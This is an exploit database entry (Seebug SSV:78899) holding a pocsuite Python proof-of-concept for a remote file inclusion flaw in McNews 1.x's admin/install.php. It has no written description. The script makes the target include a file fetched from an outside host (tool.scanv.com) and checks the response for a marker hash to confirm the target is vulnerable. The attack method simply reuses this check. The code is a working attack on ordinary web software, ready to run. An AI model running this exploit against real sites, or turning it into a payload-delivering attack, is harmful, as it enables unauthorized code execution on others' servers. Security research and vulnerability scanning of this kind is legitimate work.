McNews 1.x Install.PHP Arbitrary File Include Vulnerability

2014-07-01T00:00:00
ID SSV:78899
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class McNews_Remote_File_Include(POCBase):
    vulID = '78899'
    version = '1'
    vulDate = '2005-03-17'
    author = ' '
    createDate = '2015-12-17'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-78899']
    name = 'McNews 1.x Install.PHP Arbitrary File Include Vulnerability'
    appPowerLink = ''
    appName = 'McNews'
    appVersion = '1.x'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        response = req.get(vul_url).content

        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(McNews_Remote_File_Include)